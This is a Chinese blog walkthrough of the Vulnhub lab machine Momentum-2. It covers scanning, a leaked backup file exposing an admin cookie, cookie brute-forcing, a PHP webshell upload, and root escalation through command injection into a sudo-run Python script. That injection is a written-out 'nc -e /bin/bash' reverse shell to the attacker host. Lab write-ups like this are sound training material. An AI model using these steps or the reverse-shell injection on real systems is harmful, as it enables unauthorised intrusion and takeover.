Vulnhub——MOMENTUM-2

Vulnhub——MOMENTUM-2

一、信息收集

1.存活主机扫描

┌──(root㉿kali)-[/home/han]
└─# nmap 192.168.197.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-23 13:41 CST
Nmap scan report for 192.168.197.1
Host is up (0.00047s latency).
Not shown: 995 filtered tcp ports (no-response)
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3306/tcp open  mysql
6000/tcp open  X11
MAC Address: 00:50:56:C0:00:08 (VMware)

Nmap scan report for 192.168.197.2
Host is up (0.00013s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE
53/tcp open  domain
MAC Address: 00:50:56:F2:C0:58 (VMware)

Nmap scan report for 192.168.197.129
Host is up (0.00065s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:E4:A7:D1 (VMware)

Nmap scan report for 192.168.197.254
Host is up (0.00017s latency).
All 1000 scanned ports on 192.168.197.254 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
MAC Address: 00:50:56:E7:D5:1C (VMware)

Nmap scan report for 192.168.197.128
Host is up (0.0000030s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh

Nmap done: 256 IP addresses (5 hosts up) scanned in 7.84 seconds

2.端口探测

┌──(root㉿kali)-[/home/han]
└─# nmap -A -p- 192.168.197.129
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-23 13:42 CST
Nmap scan report for 192.168.197.129
Host is up (0.00049s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 02:32:8e:5b:27:a8:ea:f2:fe:11:db:2f:57:f4:11:7e (RSA)
|   256 74:35:c8:fb:96:c1:9f:a0:dc:73:6c:cd:83:52:bf:b7 (ECDSA)
|_  256 fc:4a:70:fb:b9:7d:32:89:35:0a:45:3d:d9:8b:c5:95 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Momentum 2 | Index
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 00:0C:29:E4:A7:D1 (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.49 ms 192.168.197.129

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.60 seconds

image-20230804090643101

3.目录探测

┌──(root㉿kali)-[/home/han]
└─# dirsearch -u http://192.168.197.129 -w /home/han/dicc.txt -x 403

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10913

Output File: /root/.dirsearch/reports/192.168.197.129/_23-02-23_13-40-44.txt

Error Log: /root/.dirsearch/logs/errors-23-02-23_13-40-44.log

Target: http://192.168.197.129/

[13:40:44] Starting:
[13:40:44] 301 -  315B  - /js  ->  http://192.168.197.129/js/
[13:40:57] 200 -    0B  - /ajax.php
[13:40:57] 200 -  357B  - /ajax.php.bak
[13:41:02] 301 -  316B  - /css  ->  http://192.168.197.129/css/
[13:41:02] 200 -  513B  - /dashboard.html
[13:41:07] 301 -  316B  - /img  ->  http://192.168.197.129/img/
[13:41:07] 200 -    1KB - /index.html
[13:41:08] 200 -  931B  - /js/
[13:41:10] 200 -  626B  - /manual/index.html
[13:41:10] 301 -  319B  - /manual  ->  http://192.168.197.129/manual/
[13:41:13] 200 -  928B  - /owls/

Task Completed

二、渗透过程

1.存在文件上传

发现存在一个上传界面

http://192.168.197.129/dashboard.html

image-20230804090704152

image-20230804090728985

image-20230804090746300

经过测试发现只允许上传txt文件

并且可看到他的上传路径

http://192.168.197.129/owls/

image-20230804090805265

上面还发现了一个,/ajax.php.bak,备份文件

//The boss told me to add one more Upper Case letter at the end of the cookie
   if(isset($_COOKIE['admin']) && $_COOKIE['admin'] == '&G6u@B6uDXMq&Ms'){

       //[+] Add if $_POST['secure'] == 'val1d'
        $valid_ext = array("pdf","php","txt");
   }
   else{

        $valid_ext = array("txt");
   }

   // Remember success upload returns 1 

查看发现需要添加cookie值为:admin:‘&G6u@B6uDXMq&Ms’ 第一句话提示我们末尾要再添加一个大写字母

还需要要POST的secure的参数值为:val1d,

例:

作为multipart body中的消息头
在 HTTP 场景中。第一个参数总是固定不变的 form-data;附加的参数不区分大小写,并且拥有参数值,参数名与参数值用等号('=')连接,参数值用双引号括起来。参数之间用分号(';')分隔。
Content-Disposition: form-data
Content-Disposition: form-data; name="fieldName"
Content-Disposition: form-data; name="fieldName"; filename="filename.jpg"

成功会返回一个1

2.漏洞利用

添加cookie值、编写POST请求,并添加POST请求值

image-20230804090827889

对最后一位的cookie值进行爆破

image-20230804090850349

最后发现R时,成功上传

image-20230804090920923

image-20230804090946803

image-20230804091005578

上传成功,使用蚁剑进行连接

image-20230804091023697

image-20230804091102071

发现了一个flag、一个用户(athena)和密码(myvulnerableapp[Asterisk])

image-20230804091127402

image-20230804091146788

image-20230804091201599

密码里面有个[Asterisk],查询后发现是一个*号

用户名:athena 密码:myvulnerableapp*

尝试进行连接

image-20230804091221269

三、提权

查看权限

可以无密码执行cookie-gen.py脚本

image-20230804091241846

先看一下这个脚本,发现需要添加一个seed参数,可以执行cmd的命令。

image-20230804091303839

执行脚本,编写语句nc反弹shell

image-20230804091322294

同时进行监听

image-20230804091340995

sudo python3 /home/team-tasks/cookie-gen.py
; nc -e /bin/bash 192.168.197.128 8888

获取root权限

image-20230804091413063

四、总结

今天环境就搞了好久

1.无法更改虚拟机的设备信息

image-20230804091432161

后来修改虚拟机的硬件兼容性为16.x后就好了

image-20230804091453714

2.一直探测不到靶机ip,后来通过查寻发现,原来是靶机的网卡配置错了

进入单用户模式修改网卡

开机时按shift,进入加载的进度条界面

image-20230804091533885

按e进入选择内核界面删除ro

image-20230804091548970

修改为:rw signie init=/bin/bash rw读写 signie单用户 命令权限/bin/bash

image-20230804091626976

ctrl+x键,进入单用户模式

查看网卡信息

image-20230804091652255

修改网卡文件,修改成一样的网卡(ens33)

image-20230804091709262

image-20230804091726460

重启网卡

/etc/init.d/networking restart

之后重启虚拟机,kali就扫到了这台靶机的ip

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值